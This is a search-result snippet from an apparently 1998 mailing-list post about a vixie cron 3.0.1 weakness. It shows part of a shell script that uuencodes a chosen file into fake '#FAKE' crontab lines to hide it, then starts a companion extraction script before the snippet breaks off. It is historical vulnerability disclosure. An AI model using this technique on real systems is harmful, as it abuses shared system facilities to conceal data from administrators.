search for: vix_tmp

Displaying 1 result from an estimated 1 matches for "vix_tmp".

Did you mean: var_tmp
1998 Feb 05
0
vixie cron 3.0.1 continued
...cho if [ "$1" = "" ]; then echo usage: $0 file_to_hide echo exit 0 fi if [ ! "`ulimit`" = "unlimited" ]; then echo Warning, filesize limit is set to `ulimit`. echo fi echo Installing fake crontab... echo echo "* * * * * # whoops..." >vix_tmp uuencode $1 <$1 | awk -F "\n" ''{print "#FAKE" $1}'' >>vix_tmp crontab vix_tmp echo "Thank you, file stored successfully." -- eof -- The next program allows futher extraction of these files: -- cron_get -- #!/bin/bash echo "Vixie cron 3...